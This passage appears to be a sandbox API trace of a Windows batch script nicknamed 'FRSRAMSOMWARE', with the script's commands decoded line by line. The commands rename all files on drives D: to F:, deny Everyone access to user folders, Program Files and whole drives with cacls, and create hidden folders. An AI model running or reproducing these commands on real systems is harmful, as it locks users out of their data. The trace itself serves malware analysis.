dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0130.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0130.676] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.676] GetFileType (hFile=0x154) returned 0x1 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0130.676] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0130.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0130.676] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.676] GetFileType (hFile=0x154) returned 0x1 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0130.676] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0130.676] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0130.676] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.676] GetFileType (hFile=0x154) returned 0x1 [0130.676] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0130.677] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0130.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0130.677] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.677] GetFileType (hFile=0x154) returned 0x1 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0130.677] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0130.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0130.677] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.677] GetFileType (hFile=0x154) returned 0x1 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0130.677] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0130.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0130.677] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.677] GetFileType (hFile=0x154) returned 0x1 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0130.677] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0130.677] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0130.677] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.677] GetFileType (hFile=0x154) returned 0x1 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0130.677] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.677] SetFilePointer (in: hFile=0x154, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0130.678] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0130.678] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.678] GetFileType (hFile=0x154) returned 0x1 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0130.678] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0130.678] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0130.678] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.678] GetFileType (hFile=0x154) returned 0x1 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0130.678] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0130.678] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0130.678] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.678] GetFileType (hFile=0x154) returned 0x1 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0130.678] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0130.678] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0130.678] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.678] GetFileType (hFile=0x154) returned 0x1 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0130.678] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0130.678] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0130.678] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0130.678] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.679] GetFileType (hFile=0x154) returned 0x1 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0130.679] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0130.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0130.679] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.679] GetFileType (hFile=0x154) returned 0x1 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0130.679] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0130.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0130.679] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.679] GetFileType (hFile=0x154) returned 0x1 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0130.679] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0130.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0130.679] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.679] GetFileType (hFile=0x154) returned 0x1 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0130.679] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0130.679] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0130.679] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.679] GetFileType (hFile=0x154) returned 0x1 [0130.679] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0130.679] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0130.680] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0130.680] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.680] GetFileType (hFile=0x154) returned 0x1 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0130.680] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0130.680] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0130.680] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.680] GetFileType (hFile=0x154) returned 0x1 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0130.680] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0130.680] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0130.680] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.680] GetFileType (hFile=0x154) returned 0x1 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0130.680] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0130.680] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0130.680] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.680] GetFileType (hFile=0x154) returned 0x1 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0130.680] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.680] SetFilePointer (in: hFile=0x154, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0130.680] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0130.681] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.681] GetFileType (hFile=0x154) returned 0x1 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0130.681] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0130.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0130.681] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.681] GetFileType (hFile=0x154) returned 0x1 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0130.681] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0130.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0130.681] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.681] GetFileType (hFile=0x154) returned 0x1 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0130.681] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0130.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0130.681] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.681] GetFileType (hFile=0x154) returned 0x1 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, 